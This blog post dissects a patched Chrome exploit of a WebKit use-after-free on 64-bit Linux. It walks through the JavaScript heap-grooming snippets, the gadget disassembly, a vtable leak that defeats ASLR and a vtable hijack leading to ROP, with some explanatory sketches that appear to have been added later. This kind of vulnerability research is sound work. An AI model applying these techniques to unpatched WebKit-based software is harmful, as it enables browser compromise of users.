Sunday, February 3, 2013

Exploiting 64-bit Linux like a boss

Back in November 2012, a Chrome Releases blog post mysteriously stated: "Congratulations to Pinkie Pie for completing challenge: 64-bit exploit".

Chrome patches and autoupdates bugs pretty fast but this is a WebKit bug and not every consumer of WebKit patches bugs particularly quickly. So I've waited a few months to release a full breakdown of the exploit. The exploit is notable because it is against 64-bit Linux. 64-bit exploits are generally harder than 32-bit exploits for various reasons, including the fact that some types of heap sprays are off the table. On top of that, Linux ASLR is generally better than Windows ASLR (although not perfect). For example, Pinkie Pie's Pwnium 2 exploit defeated Win 7 ASLR by relying on a statically-addressed system object! That sort of nonsense is generally absent from Linux ASLR.

Without any further ado, I'll paste my raw notes from the exploit deconstruction below. The number of different techniques used and steps involved is quite impressive.

The bug
A single WebKit use-after-free bug was used to gain code execution. The logic flaw in WebKit was reasonably simple: when a WebCore::HTMLVideoElement is garbage collected, the base class member WebCore::HTMLMediaElement::m_player -- a WebCore::MediaPlayer -- is freed. A different object, a WebCore::MediaSource, holds a stale pointer to the freed WebCore::MediaPlayer. The stale pointer can be prodded indirectly via Javascript methods on either the JS MediaSource object, or JS SourceBuffer objects owned by the JS MediaSource.

The exploit
The exploit is moderately complicated, with multiple steps and techniques used. Pinkie Pie states that the complexity is warranted and generally caused by a lack of control, and therefore limited options for making progress at each stage.

The exploit steps are as follows:

1. Allocate a large number of RTCIceCandidate objects (100000) and then unreference a small subset of them.
   tempia = new Uint32Array(176/4);
   rtcs = [];
   rtcstring = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
   rtcdesc = {'candidate': rtcstring, 'sdpMid': rtcstring}
   for(var i = 0; i < 100000; i++) {
       rtcs.push(new RTCIceCandidate(rtcdesc));
   }
   for(var i = 0; i < 10000; i++) rtcs[i] = null;
   for(var i = 90000; i < 100000; i++) rtcs[i] = null;

This step indirectly creates a lot of WebCore::WebCoreStringResource (V8-specific) objects, and a later garbage collection will free some subset of them.
These objects are 24 bytes in size (fitting into a tcmalloc slab of 32 byte sized allocations), so it means that any future 24 byte allocation has a large probability of being placed directly before a WebCore::WebCoreStringResource object. This is significant later.
A 176-byte sized buffer is also allocated.

2. Trigger free of MediaPlayer and the 176-byte sized buffer; allocate another MediaSource object.
   buffer = ms.addSourceBuffer('video/webm; codecs="vorbis,vp8"');
   vid = null;
   tempia = null;
   ms2 = new WebKitMediaSource();
   sbl = ms2.sourceBuffers;
The WebCore::MediaPlayer is 264 bytes in size (tcmalloc bucket 257 - 288). When it is freed, many child objects are also freed. The only important one is a 168 byte sized WebKit::WebMediaPlayerClientImpl object (tcmalloc bucket 161 - 176).
Allocation of the WebCore::MediaSource (176 bytes) also subsequently allocates a WebCore::SourceBufferList child object (168 bytes). The free of the temporary 176 byte buffer (tempia) is to ensure that its freed slot is used for the WebCore::MediaSource object, leaving the freed slot that was occupied by a WebKit::WebMediaPlayerClientImpl to be occupied by a new WebCore::SourceBufferList object.
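The slot juggling in steps 1 and 2 comes down to which allocation sizes share a tcmalloc size class. Here is a minimal sketch of that lookup. It is not tcmalloc's real table: `KNOWN_CLASSES` lists only the three classes mentioned in this post, the lower bound of the 32-byte class is an assumption, and `sizeClassFor` and `sharesSlotClass` are hypothetical helper names.

```javascript
// Only the size classes named in this post. The real allocator has many more.
// The 17-byte lower bound of the first class is an assumption for illustration.
const KNOWN_CLASSES = [
  { min: 17, max: 32 },    // WebCoreStringResource, WTF::Vector (24 bytes)
  { min: 161, max: 176 },  // WebMediaPlayerClientImpl, SourceBufferList, MediaSource
  { min: 257, max: 288 },  // MediaPlayer, RTCPeerConnection (264 bytes)
];

// Return the slot size used for an allocation, or null if the class is not listed.
function sizeClassFor(size) {
  const hit = KNOWN_CLASSES.find((c) => size >= c.min && size <= c.max);
  return hit ? hit.max : null;
}

// Two objects can reuse each other's freed slot only if they share a class.
function sharesSlotClass(a, b) {
  const classA = sizeClassFor(a);
  return classA !== null && classA === sizeClassFor(b);
}

console.log(sizeClassFor(24));           // slot size for a 24-byte object
console.log(sharesSlotClass(168, 176));  // SourceBufferList vs. MediaSource
console.log(sharesSlotClass(264, 176));  // MediaPlayer vs. MediaSource
```

Because 168 and 176 land in the same class, the exploit needs the extra tempia free to steer which of the two freed slots each new object takes.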

3. Call vtable of freed WebMediaPlayerClientImpl.
   buffer.timestampOffset = 42; // free
In C++, this triggers the call chain WebCore::SourceBuffer -> WebCore::MediaSource -> WebCore::MediaPlayer -> (virtual) WebKit::WebMediaPlayerClientImpl.
You’ll notice that the call chain bounces through the WebCore::MediaPlayer, which is freed. However, the only access is to the WebCore::MediaPlayer::m_private member at offset 72. delete’ing the object only interferes with the first 16 bytes (on account of tcmalloc writing two freelist pointers) and the WebCore::MediaPlayer::m_mediaPlayerClient member. The WebCore::MediaPlayer free slot isn’t otherwise meaningfully re-used by this point.

What happens next is fascinating. WebCore::MediaPlayer::sourceSetTimestampOffset disassembles to:
   0x00007f61a0ced4c0 <+0>: mov    rdi,QWORD PTR [rdi+0x48]
   0x00007f61a0ced4c4 <+4>: mov    rax,QWORD PTR [rdi]
   0x00007f61a0ced4c7 <+7>: mov    rax,QWORD PTR [rax+0x208]
   0x00007f61a0ced4ce <+14>: jmp    rax

This loads the vtable for the WebCore::MediaPlayer::m_private member and calls the vtable function at offset 0x208. WebCore::MediaPlayer::m_private is supposed to be a WebKit::WebMediaPlayerClientImpl object but a WebCore::SourceBufferList was overlaid there. WebCore::SourceBufferList objects have a vtable, but a much smaller one! Offset 0x208 from the start of this vtable runs past its end and hits a vtable function in a totally different vtable, specifically WebCore::RefCountedSupplement::~RefCountedSupplement, which disassembles to:
   0x00007ffd9ec51e00 <+0>: lea    rax,[rip+0x3276969]
   0x00007ffd9ec51e07 <+7>: mov    QWORD PTR [rdi],rax
   0x00007ffd9ec51e0a <+10>: jmp    0x7ffd9e5b2c80 <

As these opcodes execute, rdi is a this pointer for a WebCore::SourceBufferList object (which the calling code believed was a this pointer to a WebKit::WebMediaPlayerClientImpl object). As you can see, the side effects of these opcodes are:
- Trash the vtable pointer of the WebCore::SourceBufferList object.
- Do a free(this), i.e. free the WebCore::SourceBufferList object.
- Return cleanly to the caller.
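The "wrong vtable" effect can be modelled with plain array indexing. This is a toy sketch: the slot count of the small vtable (`SMALL_VTABLE_SLOTS`) and the contents of `rodata` are invented for illustration, and only the 0x208 offset and the 8-byte slot size come from the disassembly above.

```javascript
const POINTER_SIZE = 8;      // bytes per vtable slot on x86-64
const CALL_OFFSET = 0x208;   // from: mov rax,QWORD PTR [rax+0x208]

// The slot index the call site believes it is invoking.
const slotIndex = CALL_OFFSET / POINTER_SIZE;

// Hypothetical read-only data: one short vtable followed by unrelated vtables.
const SMALL_VTABLE_SLOTS = 10;  // invented size, for illustration only
const rodata = [];
for (let i = 0; i < SMALL_VTABLE_SLOTS; i++) {
  rodata.push('SourceBufferList slot ' + i);
}
for (let i = SMALL_VTABLE_SLOTS; i < 100; i++) {
  rodata.push('slot in some other vtable');
}

// A virtual call does no bounds check: it just indexes from the vtable start.
function resolveVirtualCall(vtableStart, byteOffset) {
  return rodata[vtableStart + byteOffset / POINTER_SIZE];
}

console.log(slotIndex);
console.log(resolveVirtualCall(0, CALL_OFFSET));
```

Which function ends up at that slot depends entirely on how the linker laid out the vtables in a given build.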

4. Use HTML5 WebDatabase functionality to allocate a SQLStatement as a side effect.
   transaction.executeSql('derp', [], function() {}, function() {});
   slength = sbl.length;
A WebCore::SQLStatement object is 176 bytes in size. So it is allocated into the slot just vacated by free’ing the WebCore::SourceBufferList object in step 3 above. This is the same slot that we free’d the WebKit::WebMediaPlayerClientImpl from.
There are now two Javascript objects pointing to freed objects: a direct handle to a freed WebCore::SourceBufferList (sbl) and an indirect handle to a freed WebKit::WebMediaPlayerClientImpl (buffer).
At this time, a call is made in Javascript to sbl.length. It is not required for the exploit and nothing is done with the integer result, but looking at this call under the covers is instructive.
To return the length, a 64-bit size_t is read from offset 136 into the WebCore::SourceBufferList object. Since a WebCore::SQLStatement was put on top of the freed WebCore::SourceBufferList, the actual value read is a WebCore::SQLStatement::m_statementErrorCallbackWrapper::m_callback member pointer. Leaking this value to Javascript might be useful as it is a heap address. However, Javascript lengths are 32-bit so only the lower 32 bits of the address are leaked. The entropy that’s important for ASLR on 64-bit Linux is largely in the next 8 bits above the bottom 32 bits, so the heap address cannot be usefully leaked!
Exploitation of similar overlap situations would not be a problem on systems with 32-bit pointers.
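To make the truncation concrete, here is a small sketch of what a 32-bit length would expose. The pointer value is an arbitrary example in the style of the addresses in this post, not a real leaked value, and BigInt is used purely for illustration (it postdates the exploit).

```javascript
// Arbitrary 64-bit pointer-like value, for illustration only.
const pointer = 0x00007f61a0ced4c0n;

// What a 32-bit length exposes: only the low 32 bits survive.
const leaked = BigInt.asUintN(32, pointer);

// What stays hidden: everything above bit 31, including the bits
// that carry the ASLR entropy discussed above.
const hidden = pointer >> 32n;

console.log(leaked.toString(16));
console.log(hidden.toString(16));
```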

5. Abuse overlapping fields in SourceBufferList vs. SQLStatement.
   sb = sbl[0xa8/8];
Next, the Javascript array index operator is used. At this time, the Javascript handle to the WebCore::SourceBufferList is actually backed by a WebCore::SQLStatement object at the C++ level. The WebCore::SourceBufferList::m_list member is a WTF::Vector and that starts with two important 64-bit fields: a length and a pointer to the underlying buffer.
As covered above, the length now maps to a pointer value. A pointer value, when treated as an integer, will be very large, effectively sizing the vector massively. And the vector’s underlying buffer pointer now maps to the member SQLStatement::m_statementErrorCallbackWrapper::m_scriptExecutionContext.

Therefore, the Javascript array operator on JS SourceBufferList will return a JS SourceBuffer object which is backed in C++ by a pointer pulled from somewhere in a C++ WebCore::ScriptExecutionContext object, depending on the array index.

The exploit uses array index 21, which corresponds to offset 168, or WebCore::ScriptExecutionContext::m_pendingExceptions. This is a pointer to a WTF::Vector. So, there is now a Javascript handle to a JS SourceBuffer object which is really backed by a WTF::Vector.
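The index arithmetic is simple enough to check by hand, but a sketch makes the two moving parts explicit: the bounds check against a "length" that is really a pointer, and the byte offset that an index turns into. The `bogusLength` value is an arbitrary pointer-like number, and both helper names are hypothetical.

```javascript
const ELEMENT_SIZE = 8n;  // each vector element is a 64-bit pointer

// Byte offset from the vector's buffer pointer that a given index reads.
function offsetForIndex(index) {
  return index * ELEMENT_SIZE;
}

// The only thing standing in the way is a comparison against the length field.
function inBounds(index, length) {
  return index < length;
}

const index = BigInt(0xa8 / 8);            // the index used in step 5
const bogusLength = 0x00007f61a0ced4c0n;   // a pointer misread as a length (example value)

console.log(index);
console.log(offsetForIndex(index));
console.log(inBounds(index, bogusLength));
```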

6. Read vtable value as a Javascript number.
   converterF64[0] = sb.timestampOffset;
In C++, the timestampOffset property is read from a 64-bit double at offset 32 of the WebCore::SourceBuffer object. The WebCore::SourceBuffer object is currently backed by a WTF::Vector object, which is 24 bytes in size and lives in a 32 byte tcmalloc slot. Therefore, a read at offset 32 will in fact read from the beginning of the next tcmalloc slot. Looking back to step 1, it was arranged to be likely that the adjacent 32 byte slot will contain a WebCore::WebCoreStringResource object. Therefore, the WebCore::WebCoreStringResource vtable is read and returned to Javascript as a number. Javascript numbers are 64-bit doubles so there are no truncation issues like those discussed with reading an integer length above in step 4.

That’s a lot of effort, but finally the exploit has leaked a vtable value to Javascript. For a given build of Chrome, it is now easy to calculate the exact address of all opcodes, functions, etc. in the binary.
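The snippets don't show how converterF64 and converterI32 are set up. A reasonable assumption is that they are two typed-array views over the same 8-byte ArrayBuffer, which is the usual way to reinterpret a double's bits as integers in Javascript. A minimal sketch under that assumption (the helper function names are hypothetical, and a little-endian host is assumed for the low/high word order):

```javascript
// Two views over the same 8 bytes: write through one, read through the other.
const scratch = new ArrayBuffer(8);
const converterF64 = new Float64Array(scratch);
const converterI32 = new Uint32Array(scratch);

// Split a double's raw bits into [low, high] 32-bit words.
function doubleToWords(value) {
  converterF64[0] = value;
  return [converterI32[0], converterI32[1]];
}

// Build the double whose raw bits are the given 32-bit words.
function wordsToDouble(low, high) {
  converterI32[0] = low;
  converterI32[1] = high;
  return converterF64[0];
}

// Round-trip an example pointer-like bit pattern (illustrative value only).
const asDouble = wordsToDouble(0xa0ced4c0, 0x00007f61);
const [low, high] = doubleToWords(asDouble);
console.log(low.toString(16), high.toString(16));
```

A user-space pointer has zero exponent bits when viewed as a double, so it shows up as a tiny subnormal number rather than a NaN, and its bits survive the trip through a Javascript number.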

7. Re-trigger use-after-free and back freed object with array buffer.
   buffer2 = ms3.addSourceBuffer('video/webm; codecs="vorbis,vp8"');
   vid2 = null;
   var ia = new Uint32Array(168/4);
   rtc2 = new webkitRTCPeerConnection({'iceServers': []});
This time, the freed WebKit::WebMediaPlayerClientImpl is replaced with a 168-byte raw buffer that can be read and written through Javascript. This is now a useful primitive because ASLR was defeated and a useful vtable pointer value can be put in the first 8 bytes of the raw byte buffer.
A WebCore::RTCPeerConnection is also allocated (264 bytes) to occupy the slot for the freed WebCore::MediaPlayer. This protects the freed WebCore::MediaPlayer from corruption. Significantly, it makes sure nothing overwrites the WebCore::MediaPlayer::m_private pointer. This pointer is needed intact. It is at offset 72 and WebCore::RTCPeerConnection does not overwrite that field during construction.

8. Leak address of a heap buffer under Javascript control.
   add64(converterI32, 0, converterI32, 0, -prepdata['found_vt']);
   add64(ia, 0, converterI32, 0, prepdata['mov_rdx_112_rdi_pp']);
   add64(ia, 0, ia, 0, -0x1e8);
   var ib8 = new Uint8Array(0x10000);
   var ib = new Uint32Array(ib8.buffer);
   var ibAddr = [ia[112/4], ia[112/4 + 1]];
Using knowledge of the binary layout, a vtable value is chosen that will result in the WebCore::MediaPlayer::sourceAppend vtable call site calling the function v8::internal::HStoreNamedField::SetSideEffectDominator. An appropriate function name. It disassembles to:
   0x00007f153efd7340 <+0>: mov    QWORD PTR [rdi+0x70],rdx
   0x00007f153efd7344 <+4>: ret    
As can be seen, the value of rdx (the 2nd non-this function parameter) is written to offset 112 of the this pointer. Here, this is backed by a raw buffer pointer for the ia Javascript Uint32Array, and rdx in the context of WebCore::MediaPlayer::sourceAppend is a raw buffer pointer for the ib Javascript Uint32Array.
Therefore, the address of a heap buffer under the control of Javascript has been leaked to Javascript.
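The add64 helper isn't shown in the snippets. Judging from the call sites, it appears to compute dst = src + delta on 64-bit values stored as two consecutive 32-bit words. The following is a hypothetical reimplementation under that assumption. It uses BigInt for brevity, which postdates the exploit; the original presumably handled the carry by hand.

```javascript
// Assumed semantics: dst[dstIdx..dstIdx+1] = src[srcIdx..srcIdx+1] + delta,
// where each pair of Uint32 words is one 64-bit integer, low word first.
function add64(dst, dstIdx, src, srcIdx, delta) {
  const value = (BigInt(src[srcIdx + 1]) << 32n) | BigInt(src[srcIdx]);
  const sum = BigInt.asUintN(64, value + BigInt(delta));
  dst[dstIdx] = Number(sum & 0xffffffffn);
  dst[dstIdx + 1] = Number(sum >> 32n);
}

// Example: an addition that carries into the high word, then the inverse.
const words = new Uint32Array([0xfffffff0, 0x00007f61]);
add64(words, 0, words, 0, 0x20);
const afterAdd = [words[0], words[1]];
add64(words, 0, words, 0, -0x20);
const afterSub = [words[0], words[1]];

console.log(afterAdd.map((w) => w.toString(16)));
console.log(afterSub.map((w) => w.toString(16)));
```

Read this way, the three add64 calls in step 8 subtract the known offset of the leaked vtable to get a base address, add the offset of a pointer to the gadget, and then subtract 0x1e8 so that the call site's vtable slot lines up with that pointer.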

9. Proceed as normal.
The exploit now has control over a vtable pointer. It can point the vtable pointer at a heap buffer where the contents can be controlled arbitrarily. The exploit is free to start ROP chains etc.
As it happens, the exploit payload is expressed in terms of valid full function calls. This is achieved by bouncing into a useful sequence of opcodes in a template base::internal::Invoker<3>:
   0x00007f153fc71d40 <+0>: mov    rax,rdi
   0x00007f153fc71d43 <+3>: lea    rcx,[rdi+0x30]
   0x00007f153fc71d47 <+7>: mov    rsi,QWORD PTR [rdi+0x20]
   0x00007f153fc71d4b <+11>: mov    rdx,QWORD PTR [rdi+0x28]
   0x00007f153fc71d4f <+15>: mov    rax,QWORD PTR [rax+0x10]
   0x00007f153fc71d53 <+19>: mov    rdi,QWORD PTR [rdi+0x18]
   0x00007f153fc71d57 <+23>: jmp    rax
As can be seen, these opcodes pull a jump target, a new this pointer and two function arguments from the current this pointer. A very useful construct.
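The field layout the gadget expects can be read straight off the disassembly. As a sketch, here is a small model of the register state after those seven instructions run against a buffer. The values written into the buffer are placeholders, `simulateInvoker` is a hypothetical name, and nothing here touches real memory.

```javascript
// Offsets read by the gadget, relative to the incoming this pointer (rdi).
const INVOKER_FIELDS = {
  jumpTarget: 0x10,  // mov rax,QWORD PTR [rax+0x10] ... jmp rax
  newThis: 0x18,     // mov rdi,QWORD PTR [rdi+0x18]
  arg1: 0x20,        // mov rsi,QWORD PTR [rdi+0x20]
  arg2: 0x28,        // mov rdx,QWORD PTR [rdi+0x28]
};

// Model the registers after the gadget runs on an object located at `base`.
function simulateInvoker(view, base) {
  const state = {};
  for (const [name, offset] of Object.entries(INVOKER_FIELDS)) {
    state[name] = view.getBigUint64(offset, true);  // little-endian load
  }
  state.rcx = base + 0x30n;  // lea rcx,[rdi+0x30]
  return state;
}

// Fill a fake object with placeholder values and see what the gadget picks up.
const fakeObject = new DataView(new ArrayBuffer(0x38));
fakeObject.setBigUint64(0x10, 0x1111n, true);
fakeObject.setBigUint64(0x18, 0x2222n, true);
fakeObject.setBigUint64(0x20, 0x3333n, true);
fakeObject.setBigUint64(0x28, 0x4444n, true);

const state = simulateInvoker(fakeObject, 0x1000n);
console.log(state);
```

Since rcx also ends up pointing at offset 0x30 of the same buffer, a third argument is available as a pointer into controlled memory.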